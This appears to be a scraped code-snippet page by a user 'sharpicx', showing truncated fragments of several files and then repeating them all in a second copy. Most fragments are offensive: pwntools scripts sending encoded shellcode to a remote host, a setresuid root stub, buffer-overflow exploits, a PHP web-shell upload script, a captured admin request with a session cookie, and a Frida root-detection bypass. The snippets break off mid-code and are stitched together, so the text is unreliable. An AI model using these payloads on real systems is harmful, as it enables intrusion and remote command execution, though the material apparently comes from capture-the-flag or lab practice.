sharpicx

## a.py
from pwn import *

context(arch="i386", os="linux", log_level="debug")
r = remote("192.168.1.100", 12321)

bin_sh = b""
bin_sh += b"\xb8\x07\x5c\xd7\x1a\xd9\xc5\xd9\x74\x24\xf4"
bin_sh += b"\x5e\x2b\xc9\xb1\x12\x31\x46\x12\x83\xc6\x04"
bin_sh += b"\x03\x41\x52\x35\xef\x7c\xb1\x4e\xf3\x2d\x06"
bin_sh += b"\xe2\x9e\xd3\x01\xe5\xef\xb5\xdc\x66\x9c\x60"

## a.js
const axios = require("axios");
const readline = require("readline");
const cheerio = require("cheerio");

const colors = {
  reset: "\x1b[0m",
  bright: "\x1b[1m",
  dim: "\x1b[2m",
  underscore: "\x1b[4m",
  blink: "\x1b[5m",

## a.asm
section .text
    global main

main:
    xor     eax, eax
    xor     ebx, ebx
    xor     ecx, ecx
    xor     edx, edx
    mov     al, 0xd0
    int     0x80       ; setresuid(0, 0, 0)

## a.py
import requests
import random
import string

def upload_txt_file(file_name):
    file_data = "<?=`$_POST[0]`?>"
    upload_uri = "http://xxxxxxxxxx/xxx/xx/xxxxxxxxx.x/xxx/xxxxxxxxx.xxxxxxx.php"
    files = {"upload[]": (file_name, file_data, "application/x-httpd-php")}
    data = {"cmd": "upload", "target": "l1_Lw"}
    response = requests.post(upload_uri, files=files, data=data)

## test.py
from twikit import Client
import json
import pandas as pd
import itertools

USERNAME = 'username here'
EMAIL = 'email here'
PASSWORD = 'password here'

client = Client('en-US')

## http.req
POST /erp/admin/security_file.php HTTP/1.1
Host: 10.1.2.120
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.1.2.120/erp/admin/security_file.php
Cookie: DOLSESSID_0720a1e225467ccab19d539968c64a66=a0jlgsjtio2d05b7ofvdcb6l73
DNT: 1
Connection: close

## exp.py
from pwn import *

context(arch='amd64', os='linux', log_level='DEBUG')

e = ELF('./pubg')
p = e.process()

offset = 96

p.recvuntil(b"coordinate: ")

## exploit.py
from pwn import *

context(arch='amd64', os='linux', log_level='debug')
e = ELF('./pwnme', checksec=True)
p = e.process()

offset = 268
p.sendline(("A" * offset) + "\xef\xbe\xad\xde")
p.interactive()
p.close()

## script.js
Java.perform(function () {
  var _class = Java.use("com.xxxxxx.xxxxxxxx.MainActivity");
  var _class2 = Java.use("b.b.a.a.a");
  var _isEmulator = _class.isEmulator;
  var _root = _class2.l;
  _isEmulator.implementation = function () {
    return false;
  };
  _root.implementation = function () {
    return false;

## bad_seed.c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

int main() {
        srand(1);
        int var_18h = rand();
        uint32_t var_14h = 0xdeadbeef;
        uint32_t total = var_14h ^ var_18h;
        printf("%d\n", total);
	from pwn import *

	context(arch="i386", os="linux", log_level="debug")
	r = remote("192.168.1.100", 12321)

	bin_sh = b""
	bin_sh += b"\xb8\x07\x5c\xd7\x1a\xd9\xc5\xd9\x74\x24\xf4"
	bin_sh += b"\x5e\x2b\xc9\xb1\x12\x31\x46\x12\x83\xc6\x04"
	bin_sh += b"\x03\x41\x52\x35\xef\x7c\xb1\x4e\xf3\x2d\x06"
	bin_sh += b"\xe2\x9e\xd3\x01\xe5\xef\xb5\xdc\x66\x9c\x60"
	const axios = require("axios");
	const readline = require("readline");
	const cheerio = require("cheerio");

	const colors = {
	reset: "\x1b[0m",
	bright: "\x1b[1m",
	dim: "\x1b[2m",
	underscore: "\x1b[4m",
	blink: "\x1b[5m",
	section .text
	global main

	main:
	xor eax, eax
	xor ebx, ebx
	xor ecx, ecx
	xor edx, edx
	mov al, 0xd0
	int 0x80 ; setresuid(0, 0, 0)
	import requests
	import random
	import string

	def upload_txt_file(file_name):
	file_data = "<?=`$_POST[0]`?>"
	upload_uri = "http://xxxxxxxxxx/xxx/xx/xxxxxxxxx.x/xxx/xxxxxxxxx.xxxxxxx.php"
	files = {"upload[]": (file_name, file_data, "application/x-httpd-php")}
	data = {"cmd": "upload", "target": "l1_Lw"}
	response = requests.post(upload_uri, files=files, data=data)
	from twikit import Client
	import json
	import pandas as pd
	import itertools

	USERNAME = 'username here'
	EMAIL = 'email here'
	PASSWORD = 'password here'

	client = Client('en-US')
	POST /erp/admin/security_file.php HTTP/1.1
	Host: 10.1.2.120
	User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Referer: http://10.1.2.120/erp/admin/security_file.php
	Cookie: DOLSESSID_0720a1e225467ccab19d539968c64a66=a0jlgsjtio2d05b7ofvdcb6l73
	DNT: 1
	Connection: close
	from pwn import *

	context(arch='amd64', os='linux', log_level='DEBUG')

	e = ELF('./pubg')
	p = e.process()

	offset = 96

	p.recvuntil(b"coordinate: ")
	from pwn import *

	context(arch='amd64', os='linux', log_level='debug')
	e = ELF('./pwnme', checksec=True)
	p = e.process()

	offset = 268
	p.sendline(("A" * offset) + "\xef\xbe\xad\xde")
	p.interactive()
	p.close()
	Java.perform(function () {
	var _class = Java.use("com.xxxxxx.xxxxxxxx.MainActivity");
	var _class2 = Java.use("b.b.a.a.a");
	var _isEmulator = _class.isEmulator;
	var _root = _class2.l;
	_isEmulator.implementation = function () {
	return false;
	};
	_root.implementation = function () {
	return false;
	#include <stdio.h>
	#include <stdlib.h>
	#include <stdint.h>

	int main() {
	srand(1);
	int var_18h = rand();
	uint32_t var_14h = 0xdeadbeef;
	uint32_t total = var_14h ^ var_18h;
	printf("%d\n", total);